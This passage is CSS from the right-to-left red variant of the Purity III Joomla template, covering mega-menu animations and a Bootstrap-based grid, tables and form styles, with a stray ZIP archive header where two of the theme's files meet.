html[dir="rtl"] .t3-megamenu.animate.zoom .level0 > .mega-align-center.open > .mega-dropdown-menu {
  -webkit-transform: scale(1, 1) translate(50%, 0);
  -ms-transform: scale(1, 1) translate(50%, 0);
  transform: scale(1, 1) translate(50%, 0);
}
html[dir="rtl"] .t3-megamenu.animate.elastic .level0 > .mega-align-center > .mega-dropdown-menu {
  transform: scale(1, 0) translate(50%, 0);
  -webkit-transform: scale(1, 0) translate(50%, 0);
  -ms-transform: scale(1, 0) translate(50%, 0);
}
html[dir="rtl"] .t3-megamenu.animate.elastic .level0 > .mega-align-center.open > .mega-dropdown-menu {
  transform: scale(1, 1) translate(50%, 0);
  -webkit-transform: scale(1, 1) translate(50%, 0);
  -ms-transform: scale(1, 1) translate(50%, 0);
}PKӜ�\���H�l�l$purity_iii/css/rtl/red/bootstrap.cssnu&1i�html {
  font-family: sans-serif;
  -ms-text-size-adjust: 100%;
  -webkit-text-size-adjust: 100%;
}
body {
  margin: 0;
}
article,
aside,
details,
figcaption,
figure,
footer,
header,
hgroup,
main,
menu,
nav,
section,
summary {
  display: block;
}
audio,
canvas,
progress,
video {
  display: inline-block;
  vertical-align: baseline;
}
audio:not([controls]) {
  display: none;
  height: 0;
}
[hidden],
template {
  display: none;
}
a {
  background-color: transparent;
}
a:active,
a:hover {
  outline: 0;
}
abbr[title] {
  border-bottom: none;
  text-decoration: underline;
  text-decoration: underline dotted;
}
b,
strong {
  font-weight: bold;
}
dfn {
  font-style: italic;
}
h1 {
  font-size: 2em;
  margin: 0.67em 0;
}
mark {
  background: #ff0;
  color: #000;
}
small {
  font-size: 80%;
}
sub,
sup {
  font-size: 75%;
  line-height: 0;
  position: relative;
  vertical-align: baseline;
}
sup {
  top: -0.5em;
}
sub {
  bottom: -0.25em;
}
img {
  border: 0;
}
svg:not(:root) {
  overflow: hidden;
}
figure {
  margin: 1em 40px;
}
hr {
  box-sizing: content-box;
  height: 0;
}
pre {
  overflow: auto;
}
code,
kbd,
pre,
samp {
  font-family: monospace, monospace;
  font-size: 1em;
}
button,
input,
optgroup,
select,
textarea {
  color: inherit;
  font: inherit;
  margin: 0;
}
button {
  overflow: visible;
}
button,
select {
  text-transform: none;
}
button,
html input[type="button"],
input[type="reset"],
input[type="submit"] {
  -webkit-appearance: button;
  cursor: pointer;
}
button[disabled],
html input[disabled] {
  cursor: default;
}
button::-moz-focus-inner,
input::-moz-focus-inner {
  border: 0;
  padding: 0;
}
input {
  line-height: normal;
}
input[type="checkbox"],
input[type="radio"] {
  box-sizing: border-box;
  padding: 0;
}
input[type="number"]::-webkit-inner-spin-button,
input[type="number"]::-webkit-outer-spin-button {
  height: auto;
}
input[type="search"] {
  -webkit-appearance: textfield;
  box-sizing: content-box;
}
input[type="search"]::-webkit-search-cancel-button,
input[type="search"]::-webkit-search-decoration {
  -webkit-appearance: none;
}
fieldset {
  border: 1px solid #c0c0c0;
  margin: 0 2px;
  padding: 0.35em 0.625em 0.75em;
}
legend {
  border: 0;
  padding: 0;
}
textarea {
  overflow: auto;
}
optgroup {
  font-weight: bold;
}
table {
  border-collapse: collapse;
  border-spacing: 0;
}
td,
th {
  padding: 0;
}

@media print {
  *,
  *:before,
  *:after {
    color: #000 !important;
    text-shadow: none !important;
    background: transparent !important;
    box-shadow: none !important;
  }
  a,
  a:visited {
    text-decoration: underline;
  }
  a[href]:after {
    content: " (" attr(href) ")";
  }
  abbr[title]:after {
    content: " (" attr(title) ")";
  }
  a[href^="#"]:after,
  a[href^="javascript:"]:after {
    content: "";
  }
  pre,
  blockquote {
    border: 1px solid #999;
    page-break-inside: avoid;
  }
  thead {
    display: table-header-group;
  }
  tr,
  img {
    page-break-inside: avoid;
  }
  img {
    max-width: 100% !important;
  }
  p,
  h2,
  h3 {
    orphans: 3;
    widows: 3;
  }
  h2,
  h3 {
    page-break-after: avoid;
  }
  .navbar {
    display: none;
  }
  .btn > .caret,
  .dropup > .btn > .caret {
    border-top-color: #000 !important;
  }
  .label {
    border: 1px solid #000;
  }
  .table {
    border-collapse: collapse !important;
  }
  .table td,
  .table th {
    background-color: #fff !important;
  }
  .table-bordered th,
  .table-bordered td {
    border: 1px solid #ddd !important;
  }
}

* {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
*:before,
*:after {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
html {
  font-size: 10px;
  -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}
body {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
  line-height: 1.42857143;
  color: #444444;
  background-color: #ffffff;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #cc0000;
  text-decoration: none;
}
a:hover,
a:focus {
  color: #800000;
  text-decoration: underline;
}
a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
figure {
  margin: 0;
}
img {
  vertical-align: middle;
}
.img-responsive,
.thumbnail > img,
.thumbnail a > img,
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  display: block;
  max-width: 100%;
  height: auto;
}
.img-rounded {
  border-radius: 0;
}
.img-thumbnail {
  padding: 4px;
  line-height: 1.42857143;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0;
  -webkit-transition: all 0.2s ease-in-out;
  -o-transition: all 0.2s ease-in-out;
  transition: all 0.2s ease-in-out;
  display: inline-block;
  max-width: 100%;
  height: auto;
}
.img-circle {
  border-radius: 50%;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.sr-only {
  position: absolute;
  width: 1px;
  height: 1px;
  padding: 0;
  margin: -1px;
  overflow: hidden;
  clip: rect(0, 0, 0, 0);
  border: 0;
}
.sr-only-focusable:active,
.sr-only-focusable:focus {
  position: static;
  width: auto;
  height: auto;
  margin: 0;
  overflow: visible;
  clip: auto;
}
[role="button"] {
  cursor: pointer;
}

code,
kbd,
pre,
samp {
  font-family: Consolas, Monaco, "Courier New", monospace;
}
code {
  padding: 2px 4px;
  font-size: 90%;
  color: #c7254e;
  background-color: #f9f2f4;
  border-radius: 0;
}
kbd {
  padding: 2px 4px;
  font-size: 90%;
  color: #ffffff;
  background-color: #333333;
  border-radius: 0;
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.25);
}
kbd kbd {
  padding: 0;
  font-size: 100%;
  font-weight: 700;
  box-shadow: none;
}
pre {
  display: block;
  padding: 9.5px;
  margin: 0 0 10px;
  font-size: 13px;
  line-height: 1.42857143;
  color: #444444;
  word-break: break-all;
  word-wrap: break-word;
  background-color: #f5f5f5;
  border: 1px solid #cccccc;
  border-radius: 0;
}
pre code {
  padding: 0;
  font-size: inherit;
  color: inherit;
  white-space: pre-wrap;
  background-color: transparent;
  border-radius: 0;
}
.pre-scrollable {
  max-height: 340px;
  overflow-y: scroll;
}
.container {
  padding-left: 20px;
  padding-right: 20px;
  margin-left: auto;
  margin-right: auto;
}
@media (min-width: 768px) {
  .container {
    width: 760px;
  }
}
@media (min-width: 992px) {
  .container {
    width: 980px;
  }
}
@media (min-width: 1200px) {
  .container {
    width: 1180px;
  }
}
.container-fluid {
  padding-left: 20px;
  padding-right: 20px;
  margin-left: auto;
  margin-right: auto;
}
.row {
  margin-left: -20px;
  margin-right: -20px;
}
.row-no-gutters {
  margin-left: 0;
  margin-right: 0;
}
.row-no-gutters [class*="col-"] {
  padding-left: 0;
  padding-right: 0;
}
.col-xs-1, .col-sm-1, .col-md-1, .col-lg-1, .col-xs-2, .col-sm-2, .col-md-2, .col-lg-2, .col-xs-3, .col-sm-3, .col-md-3, .col-lg-3, .col-xs-4, .col-sm-4, .col-md-4, .col-lg-4, .col-xs-5, .col-sm-5, .col-md-5, .col-lg-5, .col-xs-6, .col-sm-6, .col-md-6, .col-lg-6, .col-xs-7, .col-sm-7, .col-md-7, .col-lg-7, .col-xs-8, .col-sm-8, .col-md-8, .col-lg-8, .col-xs-9, .col-sm-9, .col-md-9, .col-lg-9, .col-xs-10, .col-sm-10, .col-md-10, .col-lg-10, .col-xs-11, .col-sm-11, .col-md-11, .col-lg-11, .col-xs-12, .col-sm-12, .col-md-12, .col-lg-12 {
  position: relative;
  min-height: 1px;
  padding-left: 20px;
  padding-right: 20px;
}
.col-xs-1, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9, .col-xs-10, .col-xs-11, .col-xs-12 {
  float: right;
}
.col-xs-12 {
  width: 100%;
}
.col-xs-11 {
  width: 91.66666667%;
}
.col-xs-10 {
  width: 83.33333333%;
}
.col-xs-9 {
  width: 75%;
}
.col-xs-8 {
  width: 66.66666667%;
}
.col-xs-7 {
  width: 58.33333333%;
}
.col-xs-6 {
  width: 50%;
}
.col-xs-5 {
  width: 41.66666667%;
}
.col-xs-4 {
  width: 33.33333333%;
}
.col-xs-3 {
  width: 25%;
}
.col-xs-2 {
  width: 16.66666667%;
}
.col-xs-1 {
  width: 8.33333333%;
}
.col-xs-pull-12 {
  left: 100%;
}
.col-xs-pull-11 {
  left: 91.66666667%;
}
.col-xs-pull-10 {
  left: 83.33333333%;
}
.col-xs-pull-9 {
  left: 75%;
}
.col-xs-pull-8 {
  left: 66.66666667%;
}
.col-xs-pull-7 {
  left: 58.33333333%;
}
.col-xs-pull-6 {
  left: 50%;
}
.col-xs-pull-5 {
  left: 41.66666667%;
}
.col-xs-pull-4 {
  left: 33.33333333%;
}
.col-xs-pull-3 {
  left: 25%;
}
.col-xs-pull-2 {
  left: 16.66666667%;
}
.col-xs-pull-1 {
  left: 8.33333333%;
}
.col-xs-pull-0 {
  left: auto;
}
.col-xs-push-12 {
  right: 100%;
}
.col-xs-push-11 {
  right: 91.66666667%;
}
.col-xs-push-10 {
  right: 83.33333333%;
}
.col-xs-push-9 {
  right: 75%;
}
.col-xs-push-8 {
  right: 66.66666667%;
}
.col-xs-push-7 {
  right: 58.33333333%;
}
.col-xs-push-6 {
  right: 50%;
}
.col-xs-push-5 {
  right: 41.66666667%;
}
.col-xs-push-4 {
  right: 33.33333333%;
}
.col-xs-push-3 {
  right: 25%;
}
.col-xs-push-2 {
  right: 16.66666667%;
}
.col-xs-push-1 {
  right: 8.33333333%;
}
.col-xs-push-0 {
  right: auto;
}
.col-xs-offset-12 {
  margin-right: 100%;
}
.col-xs-offset-11 {
  margin-right: 91.66666667%;
}
.col-xs-offset-10 {
  margin-right: 83.33333333%;
}
.col-xs-offset-9 {
  margin-right: 75%;
}
.col-xs-offset-8 {
  margin-right: 66.66666667%;
}
.col-xs-offset-7 {
  margin-right: 58.33333333%;
}
.col-xs-offset-6 {
  margin-right: 50%;
}
.col-xs-offset-5 {
  margin-right: 41.66666667%;
}
.col-xs-offset-4 {
  margin-right: 33.33333333%;
}
.col-xs-offset-3 {
  margin-right: 25%;
}
.col-xs-offset-2 {
  margin-right: 16.66666667%;
}
.col-xs-offset-1 {
  margin-right: 8.33333333%;
}
.col-xs-offset-0 {
  margin-right: 0%;
}
@media (min-width: 768px) {
  .col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-sm-10, .col-sm-11, .col-sm-12 {
    float: right;
  }
  .col-sm-12 {
    width: 100%;
  }
  .col-sm-11 {
    width: 91.66666667%;
  }
  .col-sm-10 {
    width: 83.33333333%;
  }
  .col-sm-9 {
    width: 75%;
  }
  .col-sm-8 {
    width: 66.66666667%;
  }
  .col-sm-7 {
    width: 58.33333333%;
  }
  .col-sm-6 {
    width: 50%;
  }
  .col-sm-5 {
    width: 41.66666667%;
  }
  .col-sm-4 {
    width: 33.33333333%;
  }
  .col-sm-3 {
    width: 25%;
  }
  .col-sm-2 {
    width: 16.66666667%;
  }
  .col-sm-1 {
    width: 8.33333333%;
  }
  .col-sm-pull-12 {
    left: 100%;
  }
  .col-sm-pull-11 {
    left: 91.66666667%;
  }
  .col-sm-pull-10 {
    left: 83.33333333%;
  }
  .col-sm-pull-9 {
    left: 75%;
  }
  .col-sm-pull-8 {
    left: 66.66666667%;
  }
  .col-sm-pull-7 {
    left: 58.33333333%;
  }
  .col-sm-pull-6 {
    left: 50%;
  }
  .col-sm-pull-5 {
    left: 41.66666667%;
  }
  .col-sm-pull-4 {
    left: 33.33333333%;
  }
  .col-sm-pull-3 {
    left: 25%;
  }
  .col-sm-pull-2 {
    left: 16.66666667%;
  }
  .col-sm-pull-1 {
    left: 8.33333333%;
  }
  .col-sm-pull-0 {
    left: auto;
  }
  .col-sm-push-12 {
    right: 100%;
  }
  .col-sm-push-11 {
    right: 91.66666667%;
  }
  .col-sm-push-10 {
    right: 83.33333333%;
  }
  .col-sm-push-9 {
    right: 75%;
  }
  .col-sm-push-8 {
    right: 66.66666667%;
  }
  .col-sm-push-7 {
    right: 58.33333333%;
  }
  .col-sm-push-6 {
    right: 50%;
  }
  .col-sm-push-5 {
    right: 41.66666667%;
  }
  .col-sm-push-4 {
    right: 33.33333333%;
  }
  .col-sm-push-3 {
    right: 25%;
  }
  .col-sm-push-2 {
    right: 16.66666667%;
  }
  .col-sm-push-1 {
    right: 8.33333333%;
  }
  .col-sm-push-0 {
    right: auto;
  }
  .col-sm-offset-12 {
    margin-right: 100%;
  }
  .col-sm-offset-11 {
    margin-right: 91.66666667%;
  }
  .col-sm-offset-10 {
    margin-right: 83.33333333%;
  }
  .col-sm-offset-9 {
    margin-right: 75%;
  }
  .col-sm-offset-8 {
    margin-right: 66.66666667%;
  }
  .col-sm-offset-7 {
    margin-right: 58.33333333%;
  }
  .col-sm-offset-6 {
    margin-right: 50%;
  }
  .col-sm-offset-5 {
    margin-right: 41.66666667%;
  }
  .col-sm-offset-4 {
    margin-right: 33.33333333%;
  }
  .col-sm-offset-3 {
    margin-right: 25%;
  }
  .col-sm-offset-2 {
    margin-right: 16.66666667%;
  }
  .col-sm-offset-1 {
    margin-right: 8.33333333%;
  }
  .col-sm-offset-0 {
    margin-right: 0%;
  }
}
@media (min-width: 992px) {
  .col-md-1, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-md-10, .col-md-11, .col-md-12 {
    float: right;
  }
  .col-md-12 {
    width: 100%;
  }
  .col-md-11 {
    width: 91.66666667%;
  }
  .col-md-10 {
    width: 83.33333333%;
  }
  .col-md-9 {
    width: 75%;
  }
  .col-md-8 {
    width: 66.66666667%;
  }
  .col-md-7 {
    width: 58.33333333%;
  }
  .col-md-6 {
    width: 50%;
  }
  .col-md-5 {
    width: 41.66666667%;
  }
  .col-md-4 {
    width: 33.33333333%;
  }
  .col-md-3 {
    width: 25%;
  }
  .col-md-2 {
    width: 16.66666667%;
  }
  .col-md-1 {
    width: 8.33333333%;
  }
  .col-md-pull-12 {
    left: 100%;
  }
  .col-md-pull-11 {
    left: 91.66666667%;
  }
  .col-md-pull-10 {
    left: 83.33333333%;
  }
  .col-md-pull-9 {
    left: 75%;
  }
  .col-md-pull-8 {
    left: 66.66666667%;
  }
  .col-md-pull-7 {
    left: 58.33333333%;
  }
  .col-md-pull-6 {
    left: 50%;
  }
  .col-md-pull-5 {
    left: 41.66666667%;
  }
  .col-md-pull-4 {
    left: 33.33333333%;
  }
  .col-md-pull-3 {
    left: 25%;
  }
  .col-md-pull-2 {
    left: 16.66666667%;
  }
  .col-md-pull-1 {
    left: 8.33333333%;
  }
  .col-md-pull-0 {
    left: auto;
  }
  .col-md-push-12 {
    right: 100%;
  }
  .col-md-push-11 {
    right: 91.66666667%;
  }
  .col-md-push-10 {
    right: 83.33333333%;
  }
  .col-md-push-9 {
    right: 75%;
  }
  .col-md-push-8 {
    right: 66.66666667%;
  }
  .col-md-push-7 {
    right: 58.33333333%;
  }
  .col-md-push-6 {
    right: 50%;
  }
  .col-md-push-5 {
    right: 41.66666667%;
  }
  .col-md-push-4 {
    right: 33.33333333%;
  }
  .col-md-push-3 {
    right: 25%;
  }
  .col-md-push-2 {
    right: 16.66666667%;
  }
  .col-md-push-1 {
    right: 8.33333333%;
  }
  .col-md-push-0 {
    right: auto;
  }
  .col-md-offset-12 {
    margin-right: 100%;
  }
  .col-md-offset-11 {
    margin-right: 91.66666667%;
  }
  .col-md-offset-10 {
    margin-right: 83.33333333%;
  }
  .col-md-offset-9 {
    margin-right: 75%;
  }
  .col-md-offset-8 {
    margin-right: 66.66666667%;
  }
  .col-md-offset-7 {
    margin-right: 58.33333333%;
  }
  .col-md-offset-6 {
    margin-right: 50%;
  }
  .col-md-offset-5 {
    margin-right: 41.66666667%;
  }
  .col-md-offset-4 {
    margin-right: 33.33333333%;
  }
  .col-md-offset-3 {
    margin-right: 25%;
  }
  .col-md-offset-2 {
    margin-right: 16.66666667%;
  }
  .col-md-offset-1 {
    margin-right: 8.33333333%;
  }
  .col-md-offset-0 {
    margin-right: 0%;
  }
}
@media (min-width: 1200px) {
  .col-lg-1, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-lg-10, .col-lg-11, .col-lg-12 {
    float: right;
  }
  .col-lg-12 {
    width: 100%;
  }
  .col-lg-11 {
    width: 91.66666667%;
  }
  .col-lg-10 {
    width: 83.33333333%;
  }
  .col-lg-9 {
    width: 75%;
  }
  .col-lg-8 {
    width: 66.66666667%;
  }
  .col-lg-7 {
    width: 58.33333333%;
  }
  .col-lg-6 {
    width: 50%;
  }
  .col-lg-5 {
    width: 41.66666667%;
  }
  .col-lg-4 {
    width: 33.33333333%;
  }
  .col-lg-3 {
    width: 25%;
  }
  .col-lg-2 {
    width: 16.66666667%;
  }
  .col-lg-1 {
    width: 8.33333333%;
  }
  .col-lg-pull-12 {
    left: 100%;
  }
  .col-lg-pull-11 {
    left: 91.66666667%;
  }
  .col-lg-pull-10 {
    left: 83.33333333%;
  }
  .col-lg-pull-9 {
    left: 75%;
  }
  .col-lg-pull-8 {
    left: 66.66666667%;
  }
  .col-lg-pull-7 {
    left: 58.33333333%;
  }
  .col-lg-pull-6 {
    left: 50%;
  }
  .col-lg-pull-5 {
    left: 41.66666667%;
  }
  .col-lg-pull-4 {
    left: 33.33333333%;
  }
  .col-lg-pull-3 {
    left: 25%;
  }
  .col-lg-pull-2 {
    left: 16.66666667%;
  }
  .col-lg-pull-1 {
    left: 8.33333333%;
  }
  .col-lg-pull-0 {
    left: auto;
  }
  .col-lg-push-12 {
    right: 100%;
  }
  .col-lg-push-11 {
    right: 91.66666667%;
  }
  .col-lg-push-10 {
    right: 83.33333333%;
  }
  .col-lg-push-9 {
    right: 75%;
  }
  .col-lg-push-8 {
    right: 66.66666667%;
  }
  .col-lg-push-7 {
    right: 58.33333333%;
  }
  .col-lg-push-6 {
    right: 50%;
  }
  .col-lg-push-5 {
    right: 41.66666667%;
  }
  .col-lg-push-4 {
    right: 33.33333333%;
  }
  .col-lg-push-3 {
    right: 25%;
  }
  .col-lg-push-2 {
    right: 16.66666667%;
  }
  .col-lg-push-1 {
    right: 8.33333333%;
  }
  .col-lg-push-0 {
    right: auto;
  }
  .col-lg-offset-12 {
    margin-right: 100%;
  }
  .col-lg-offset-11 {
    margin-right: 91.66666667%;
  }
  .col-lg-offset-10 {
    margin-right: 83.33333333%;
  }
  .col-lg-offset-9 {
    margin-right: 75%;
  }
  .col-lg-offset-8 {
    margin-right: 66.66666667%;
  }
  .col-lg-offset-7 {
    margin-right: 58.33333333%;
  }
  .col-lg-offset-6 {
    margin-right: 50%;
  }
  .col-lg-offset-5 {
    margin-right: 41.66666667%;
  }
  .col-lg-offset-4 {
    margin-right: 33.33333333%;
  }
  .col-lg-offset-3 {
    margin-right: 25%;
  }
  .col-lg-offset-2 {
    margin-right: 16.66666667%;
  }
  .col-lg-offset-1 {
    margin-right: 8.33333333%;
  }
  .col-lg-offset-0 {
    margin-right: 0%;
  }
}
table {
  background-color: transparent;
}
table col[class*="col-"] {
  position: static;
  display: table-column;
  float: none;
}
table td[class*="col-"],
table th[class*="col-"] {
  position: static;
  display: table-cell;
  float: none;
}
caption {
  padding-top: 8px;
  padding-bottom: 8px;
  color: #999999;
  text-align: right;
}
th {
  text-align: right;
}
.table {
  width: 100%;
  max-width: 100%;
  margin-bottom: 20px;
}
.table > thead > tr > th,
.table > tbody > tr > th,
.table > tfoot > tr > th,
.table > thead > tr > td,
.table > tbody > tr > td,
.table > tfoot > tr > td {
  padding: 8px;
  line-height: 1.42857143;
  vertical-align: top;
  border-top: 1px solid #dddddd;
}
.table > thead > tr > th {
  vertical-align: bottom;
  border-bottom: 2px solid #dddddd;
}
.table > caption + thead > tr:first-child > th,
.table > colgroup + thead > tr:first-child > th,
.table > thead:first-child > tr:first-child > th,
.table > caption + thead > tr:first-child > td,
.table > colgroup + thead > tr:first-child > td,
.table > thead:first-child > tr:first-child > td {
  border-top: 0;
}
.table > tbody + tbody {
  border-top: 2px solid #dddddd;
}
.table .table {
  background-color: #ffffff;
}
.table-condensed > thead > tr > th,
.table-condensed > tbody > tr > th,
.table-condensed > tfoot > tr > th,
.table-condensed > thead > tr > td,
.table-condensed > tbody > tr > td,
.table-condensed > tfoot > tr > td {
  padding: 5px;
}
.table-bordered {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > tbody > tr > th,
.table-bordered > tfoot > tr > th,
.table-bordered > thead > tr > td,
.table-bordered > tbody > tr > td,
.table-bordered > tfoot > tr > td {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > thead > tr > td {
  border-bottom-width: 2px;
}
.table-striped > tbody > tr:nth-of-type(odd) {
  background-color: #f9f9f9;
}
.table-hover > tbody > tr:hover {
  background-color: #f5f5f5;
}
.table > thead > tr > td.active,
.table > tbody > tr > td.active,
.table > tfoot > tr > td.active,
.table > thead > tr > th.active,
.table > tbody > tr > th.active,
.table > tfoot > tr > th.active,
.table > thead > tr.active > td,
.table > tbody > tr.active > td,
.table > tfoot > tr.active > td,
.table > thead > tr.active > th,
.table > tbody > tr.active > th,
.table > tfoot > tr.active > th {
  background-color: #f5f5f5;
}
.table-hover > tbody > tr > td.active:hover,
.table-hover > tbody > tr > th.active:hover,
.table-hover > tbody > tr.active:hover > td,
.table-hover > tbody > tr:hover > .active,
.table-hover > tbody > tr.active:hover > th {
  background-color: #e8e8e8;
}
.table > thead > tr > td.success,
.table > tbody > tr > td.success,
.table > tfoot > tr > td.success,
.table > thead > tr > th.success,
.table > tbody > tr > th.success,
.table > tfoot > tr > th.success,
.table > thead > tr.success > td,
.table > tbody > tr.success > td,
.table > tfoot > tr.success > td,
.table > thead > tr.success > th,
.table > tbody > tr.success > th,
.table > tfoot > tr.success > th {
  background-color: #dff0d8;
}
.table-hover > tbody > tr > td.success:hover,
.table-hover > tbody > tr > th.success:hover,
.table-hover > tbody > tr.success:hover > td,
.table-hover > tbody > tr:hover > .success,
.table-hover > tbody > tr.success:hover > th {
  background-color: #d0e9c6;
}
.table > thead > tr > td.info,
.table > tbody > tr > td.info,
.table > tfoot > tr > td.info,
.table > thead > tr > th.info,
.table > tbody > tr > th.info,
.table > tfoot > tr > th.info,
.table > thead > tr.info > td,
.table > tbody > tr.info > td,
.table > tfoot > tr.info > td,
.table > thead > tr.info > th,
.table > tbody > tr.info > th,
.table > tfoot > tr.info > th {
  background-color: #d9edf7;
}
.table-hover > tbody > tr > td.info:hover,
.table-hover > tbody > tr > th.info:hover,
.table-hover > tbody > tr.info:hover > td,
.table-hover > tbody > tr:hover > .info,
.table-hover > tbody > tr.info:hover > th {
  background-color: #c4e3f3;
}
.table > thead > tr > td.warning,
.table > tbody > tr > td.warning,
.table > tfoot > tr > td.warning,
.table > thead > tr > th.warning,
.table > tbody > tr > th.warning,
.table > tfoot > tr > th.warning,
.table > thead > tr.warning > td,
.table > tbody > tr.warning > td,
.table > tfoot > tr.warning > td,
.table > thead > tr.warning > th,
.table > tbody > tr.warning > th,
.table > tfoot > tr.warning > th {
  background-color: #fcf8e3;
}
.table-hover > tbody > tr > td.warning:hover,
.table-hover > tbody > tr > th.warning:hover,
.table-hover > tbody > tr.warning:hover > td,
.table-hover > tbody > tr:hover > .warning,
.table-hover > tbody > tr.warning:hover > th {
  background-color: #faf2cc;
}
.table > thead > tr > td.danger,
.table > tbody > tr > td.danger,
.table > tfoot > tr > td.danger,
.table > thead > tr > th.danger,
.table > tbody > tr > th.danger,
.table > tfoot > tr > th.danger,
.table > thead > tr.danger > td,
.table > tbody > tr.danger > td,
.table > tfoot > tr.danger > td,
.table > thead > tr.danger > th,
.table > tbody > tr.danger > th,
.table > tfoot > tr.danger > th {
  background-color: #f2dede;
}
.table-hover > tbody > tr > td.danger:hover,
.table-hover > tbody > tr > th.danger:hover,
.table-hover > tbody > tr.danger:hover > td,
.table-hover > tbody > tr:hover > .danger,
.table-hover > tbody > tr.danger:hover > th {
  background-color: #ebcccc;
}
.table-responsive {
  min-height: .01%;
  overflow-x: auto;
}
@media screen and (max-width: 767px) {
  .table-responsive {
    width: 100%;
    margin-bottom: 15px;
    overflow-y: hidden;
    -ms-overflow-style: -ms-autohiding-scrollbar;
    border: 1px solid #dddddd;
  }
  .table-responsive > .table {
    margin-bottom: 0;
  }
  .table-responsive > .table > thead > tr > th,
  .table-responsive > .table > tbody > tr > th,
  .table-responsive > .table > tfoot > tr > th,
  .table-responsive > .table > thead > tr > td,
  .table-responsive > .table > tbody > tr > td,
  .table-responsive > .table > tfoot > tr > td {
    white-space: nowrap;
  }
  .table-responsive > .table-bordered {
    border: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:first-child,
  .table-responsive > .table-bordered > tbody > tr > th:first-child,
  .table-responsive > .table-bordered > tfoot > tr > th:first-child,
  .table-responsive > .table-bordered > thead > tr > td:first-child,
  .table-responsive > .table-bordered > tbody > tr > td:first-child,
  .table-responsive > .table-bordered > tfoot > tr > td:first-child {
    border-right: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:last-child,
  .table-responsive > .table-bordered > tbody > tr > th:last-child,
  .table-responsive > .table-bordered > tfoot > tr > th:last-child,
  .table-responsive > .table-bordered > thead > tr > td:last-child,
  .table-responsive > .table-bordered > tbody > tr > td:last-child,
  .table-responsive > .table-bordered > tfoot > tr > td:last-child {
    border-left: 0;
  }
  .table-responsive > .table-bordered > tbody > tr:last-child > th,
  .table-responsive > .table-bordered > tfoot > tr:last-child > th,
  .table-responsive > .table-bordered > tbody > tr:last-child > td,
  .table-responsive > .table-bordered > tfoot > tr:last-child > td {
    border-bottom: 0;
  }
}
select,
textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.inputbox {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
  background-color: #ffffff;
  background-image: none;
  border: 1px solid #cccccc;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
